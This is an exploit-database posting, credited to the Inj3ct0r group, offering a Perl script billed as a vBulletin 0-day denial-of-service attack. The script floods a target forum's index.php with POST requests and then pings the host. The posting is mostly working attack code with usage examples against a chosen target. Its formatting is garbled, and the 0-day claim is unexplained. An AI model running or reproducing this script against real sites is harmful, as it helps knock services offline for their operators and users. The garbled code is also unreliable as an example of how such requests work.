vBulletin 0-day Denial Of Service Exploit (2)
Posted on 18 April 2010
============================================= vBulletin 0-day Denial Of Service Exploit (2) ============================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 #################################### 1 0 I'm SeeMe member from Inj3ct0r Team 1 1 #################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 # VBulletin 0-day denial of service II # #Perl Script use Socket; if (@ARGV < 2) { &usage; } $rand=rand(10); $host = $ARGV[0]; $dir = $ARGV[1]; $host =~ s/(http://)//eg; for ($i=0; $i<10; $i++) { $user="vbulletin".$rand.$i; $data = "s=&"; ; $len = length $data; $foo = "POST ".$dir."index.php HTTP/1.1 ". "Accept: * /* ". "Accept-Language: en-gb ". "Content-Type: application/x-www-form-urlencoded ". "Accept-Encoding: gzip, deflate ". "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) ". "Host: $host ". "Content-Length: $len ". "Connection: Keep-Alive ". "Cache-Control: no-cache ". "$data"; my $port = "80"; my $proto = getprotobyname('tcp'); socket(SOCKET, PF_INET, SOCK_STREAM, $proto); connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo; send(SOCKET,"$foo", 0); syswrite STDOUT, "Fire"; } print "nn"; system('ping $host'); sub usage { print "tusage: n"; print "t$0 n"; print "tex: $0 127.0.0.1 /forum/n"; print "tex2: $0 127.0.0.1 / (if there isn't a dir)nn"; exit(); }; ############################################### # Created by SeeMe # Greetz to In3ct0r.com Team # Inj3ct0r.com [2010-04-18]
